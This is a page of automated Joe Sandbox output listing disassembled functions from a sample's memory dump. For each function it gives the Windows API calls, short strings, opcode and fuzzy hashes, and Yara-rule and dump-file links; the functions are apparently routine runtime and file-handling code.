Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction ID: 533da1c15f7007c2fcbd4dcafc4f8d0db12b115e6bb39209025c345be1c09e0a
Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction Fuzzy Hash: 16A155719003C6AFEB21CE2AC8817AEBBA5FF16314F144269E5D5DB381C2B48842C755

Function 008CA2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,008C80B7,?,?,?), ref: 008CA351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,008C80B7,?,?), ref: 008CA395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,008C80B7,?,?,?,?,?,?,?,?), ref: 008CA416
CloseHandle.KERNEL32(?,?,00000000,?,008C80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 008CA41D

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 9a2bd20fd82c51a23c24bf9c8b31cbbdb00a571be8f65cf106c9e94f5588116a
Instruction ID: f67d76e79f2c8edb00ce538e1cd7d811f6beed6815c493023de74f634f0152db
Opcode Fuzzy Hash: 9a2bd20fd82c51a23c24bf9c8b31cbbdb00a571be8f65cf106c9e94f5588116a
Instruction Fuzzy Hash: A941CD30248388AAD729DF74DC55FAABBE4FB81708F04091DB5D1D3281D674DA48DB53

Function 008EC099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008E89AD,?,00000000,?,00000001,?,?,00000001,008E89AD,?), ref: 008EC0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008EC16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008E67E2,?), ref: 008EC181
__freea.LIBCMT ref: 008EC18A

Part of subcall function 008E8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008EC13D,00000000,?,008E67E2,?,00000008,?,008E89AD,?,?,?), ref: 008E854A

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 864819f5365d09b430fc34626b0fff36257edd3bcd61ef8abdacd5fa16762aff
Instruction ID: 1b85a4c4e182b6ff452b0bbfaef5ef573bd9203ede316626e78e81341785056a
Opcode Fuzzy Hash: 864819f5365d09b430fc34626b0fff36257edd3bcd61ef8abdacd5fa16762aff
Instruction Fuzzy Hash: B031FC72A0024AABDF259F7ACC45DAE7BA9FB01310F050228FC04DB251EB35CD52CBA0

Function 008E2503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 008E251A

Part of subcall function 008E2B52: ___AdjustPointer.LIBCMT ref: 008E2B9C

_UnwindNestedFrames.LIBCMT ref: 008E2531
___FrameUnwindToState.LIBVCRUNTIME ref: 008E2543
CallCatchBlock.LIBVCRUNTIME ref: 008E2567

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: 758becde852e75b0f82d9e90d47c97616a1076b01108ca19dfcda9e0c2c470db
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: C5012932000148FBCF129F5ADD01EDA3BBAFF5A714F158515FE18A6121C336E961EBA1

Function 008D9DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 008D9DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 008D9DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008D9DDB
ReleaseDC.USER32(00000000,00000000), ref: 008D9DE9

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 88508ee69af841361e54c15a44a600208ce7488050199a31bd9a75778004e900
Instruction ID: 187f186e87188407bcd47b70b72dee3e4aaa19382da963673df9f63fbe28e4bb
Opcode Fuzzy Hash: 88508ee69af841361e54c15a44a600208ce7488050199a31bd9a75778004e900
Instruction Fuzzy Hash: 51E0EC31AE9621BBD3301BA4AC0DB8B3B54BB09712F050115F645961A0DA704406EB94

Function 008E2016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 008E2016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 008E201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 008E2020

Part of subcall function 008E310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 008E311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 008E2035

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: 80387b54b626f900fbfda0a2adc89d652f38f282d65e10416ea2d691c67ce1f7
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: 65C04C25004AC4D41C513ABF310A1BD2708FC637C8B9224C6F880D71C3DE060F0A9477

Function 008D9F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 008D9DF1: GetDC.USER32(00000000), ref: 008D9DF5
Part of subcall function 008D9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 008D9E00
Part of subcall function 008D9DF1: ReleaseDC.USER32(00000000,00000000), ref: 008D9E0B

GetObjectW.GDI32(?,00000018,?), ref: 008D9F8D

Part of subcall function 008DA1E5: GetDC.USER32(00000000), ref: 008DA1EE
Part of subcall function 008DA1E5: GetObjectW.GDI32(?,00000018,?), ref: 008DA21D
Part of subcall function 008DA1E5: ReleaseDC.USER32(00000000,?), ref: 008DA2B5

Strings

(, xrefs: 008DA0A3

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 7ed781760232fb15d6865a9aca47d6f1b04ac7756c7d5b00ff4a6bf5058c8a4f
Instruction ID: 31536baa9ae9c14abb9d946443bffc6ca391195a69664e1bd7ef0f62bc07e3c7
Opcode Fuzzy Hash: 7ed781760232fb15d6865a9aca47d6f1b04ac7756c7d5b00ff4a6bf5058c8a4f
Instruction Fuzzy Hash: 09811371208614AFC714DF68C844E2ABBE9FF88715F10491EF98AD7360DB31AE05DB52

Function 008D0E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 008D0FF1

Strings

%ls, xrefs: 008D0E76, 008D0E8C
%s: %s, xrefs: 008D1000

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: e0c7d1aa4de2500755b4c953084f1e2aec01a3a77e0adddedc5bfcf090f0c010
Instruction ID: 13c6abb0e9867ad81817373458233ccf5b64109e05d486f5fdf618c5ed2eb913
Opcode Fuzzy Hash: e0c7d1aa4de2500755b4c953084f1e2aec01a3a77e0adddedc5bfcf090f0c010
Instruction Fuzzy Hash: 5351B63158C708FAEE2026E5DC46F367765FB08B04F244B17B39BE46D6CAA15490AE13

Function 008EA918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008EAA84

Part of subcall function 008E8849: IsProcessorFeaturePresent.KERNEL32(00000017,008E8838,00000050,008F3958,?,008CCFE0,00000004,00900EE8,?,?,008E8845,00000000,00000000,00000000,00000000,00000000), ref: 008E884B
Part of subcall function 008E8849: GetCurrentProcess.KERNEL32(C0000417,008F3958,00000050,00900EE8), ref: 008E886D
Part of subcall function 008E8849: TerminateProcess.KERNEL32(00000000), ref: 008E8874

Strings

., xrefs: 008EAC3B
*?, xrefs: 008EA95B

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction ID: 01893d70fa1bd5780e85ee6b6d5e3de10fe94820782423da43183ae36fd204f9
Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction Fuzzy Hash: 1E51D371D0025AAFDF18DFA9C8819ADBBF5FF59710F248069E854E7341E631AE01CB51

Function 008C772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C7730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008C78CC

Part of subcall function 008CA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,008CA27A,?,?,?,008CA113,?,00000001,00000000,?,?), ref: 008CA458
Part of subcall function 008CA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,008CA27A,?,?,?,008CA113,?,00000001,00000000,?,?), ref: 008CA489

Strings

:, xrefs: 008C77A1

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: f670a99d8cc9706afeb594656c0b6b298b19416c9ad37ad9a5fac32f9bcdb9b9
Instruction ID: cd33fba9556c14d9a5ee61c1df23b52daf755afb659a04438b6e24d671f8b0f6
Opcode Fuzzy Hash: f670a99d8cc9706afeb594656c0b6b298b19416c9ad37ad9a5fac32f9bcdb9b9
Instruction Fuzzy Hash: D5414F71804218AAEB25EB54CD49FEEB37CFF51300F0040AEB649E2192DB749B84CF66

Function 008CB66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

\\?\, xrefs: 008CB6BE, 008CB6FA, 008CB75B, 008CB7AE
UNC, xrefs: 008CB708

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 5d8ef9f71e90d38819d9b493ea146f189cfc24de9f018a0213ce1f13accda682
Instruction ID: d70db8bceebceb8aa4c078903b95b7a22a8fb67daa0ba149173bbbeb2ff5844f
Opcode Fuzzy Hash: 5d8ef9f71e90d38819d9b493ea146f189cfc24de9f018a0213ce1f13accda682
Instruction Fuzzy Hash: E441793580065DBBDB20AE25DC46FAB77BAFF85390F10402AFD14E7252E774DA508AA1

Function 008D8FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 008D8FC4

Strings

about:blank, xrefs: 008D9082
Shell.Explorer, xrefs: 008D8FEF

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 2bbdbe2d27fa66230c08fbd6554d0462ac713377cea3ceb690a9268e1d9d963d
Instruction ID: 4abc904c7eb312ecd06540892f95f7ab372037bc705e692175d492925b8292c0
Opcode Fuzzy Hash: 2bbdbe2d27fa66230c08fbd6554d0462ac713377cea3ceb690a9268e1d9d963d
Instruction Fuzzy Hash: 5E2171712047149FCB08AF68D895A2A77A8FF44711B14866FF949CB386DF70ED00CB61

Function 008CEBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 008CEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 008CEB92
Part of subcall function 008CEB73: GetProcAddress.KERNEL32(009081C0,CryptUnprotectMemory), ref: 008CEBA2

GetCurrentProcessId.KERNEL32(?,?,?,008CEBEC), ref: 008CEC84

Strings

CryptProtectMemory failed, xrefs: 008CEC3B
CryptUnprotectMemory failed, xrefs: 008CEC7C

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: d0a30cc5ceefcd807dee9f89a3544635dd7667c4ebb3c1bf11730ec0ace831c4
Instruction ID: 3e2a3d22a4defc0907aa0ef490ea8429521fd322e9c529eed6108b33d6cadd38
Opcode Fuzzy Hash: d0a30cc5ceefcd807dee9f89a3544635dd7667c4ebb3c1bf11730ec0ace831c4
Instruction Fuzzy Hash: 5A113631A296289FDB255B34DC46F6E3764FF04720B04801DF805EB281DB39DE4197D5

Function 008D0889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,008D09D0,?,00000000,00000000), ref: 008D08AD
SetThreadPriority.KERNEL32(?,00000000), ref: 008D08F4

Part of subcall function 008C6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008C6EAF

Strings

CreateThread failed, xrefs: 008D08B9

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: e1e2910ba2314674b9d578795cb27e1a4de52e16fb365576396821899e5eeb24
Instruction ID: b2c78c54a9d8138ee3e83a9707ad5780c94925c0355c828707ea466d5209b5d4
Opcode Fuzzy Hash: e1e2910ba2314674b9d578795cb27e1a4de52e16fb365576396821899e5eeb24
Instruction Fuzzy Hash: A101DBB53443066FD6205F64EC41F767798FB80715F20013FF786D22C1CEB1A840AA64

Function 008C130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 008CDA98: _swprintf.LIBCMT ref: 008CDABE
Part of subcall function 008CDA98: _strlen.LIBCMT ref: 008CDADF
Part of subcall function 008CDA98: SetDlgItemTextW.USER32(?,008FE154,?), ref: 008CDB3F
Part of subcall function 008CDA98: GetWindowRect.USER32(?,?), ref: 008CDB79
Part of subcall function 008CDA98: GetClientRect.USER32(?,?), ref: 008CDB85

GetDlgItem.USER32(00000000,00003021), ref: 008C134F
SetWindowTextW.USER32(00000000,008F35B4), ref: 008C1365

Strings

0, xrefs: 008C130E

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 9d15f5232fc501ecde63016fd5f00f26cba3cefe7b730926792d5fa34d751345
Instruction ID: 106d16a59ad7514ddef569688978359703c4736335912a2289c9c51554ca9227
Opcode Fuzzy Hash: 9d15f5232fc501ecde63016fd5f00f26cba3cefe7b730926792d5fa34d751345
Instruction Fuzzy Hash: EBF0313010838CAADF255F70C94DFA93BA8FB5634DF084418FD45D5BA2C778C5A5AA90

Function 008D084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,008D0A78,?), ref: 008D0854
GetLastError.KERNEL32(?), ref: 008D0860

Part of subcall function 008C6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008C6EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 008D0869

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: dfb1e9df5b794f5cd323fbd69519179daf67f3ed920242f2f6ddd46fe8a2418d
Instruction ID: 92d884140678ca31d3ea211518a465424a161b87e78a3fe27159b27c71871ec4
Opcode Fuzzy Hash: dfb1e9df5b794f5cd323fbd69519179daf67f3ed920242f2f6ddd46fe8a2418d
Instruction Fuzzy Hash: 73D0C73190842126CA102338AC0AEBB3A14FB82330F60032AF239E52E4EE3009609296

Function 008CDA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

